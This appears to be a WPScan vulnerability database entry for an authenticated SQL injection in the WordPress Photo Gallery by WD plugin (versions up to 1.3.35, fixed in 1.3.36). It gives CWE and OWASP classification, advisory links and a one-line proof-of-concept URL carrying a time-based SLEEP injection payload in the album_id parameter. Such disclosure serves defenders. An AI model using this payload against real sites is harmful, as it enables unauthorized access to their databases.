Photo Gallery by WD <= 1.3.35 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
Proof of Concept
http://www.vulnerablesite.com/wp-admin/admin-ajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

Affects Plugin

fixed in version 1.3.36

References

URL http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter DefenseCode
Views 313
Verified Yes
WPVDB ID 8804

Timeline

Publicly Published 2017-05-02 (8 months ago)
Added 2017-05-05 (7 months ago)
Last Updated 2017-05-05 (7 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.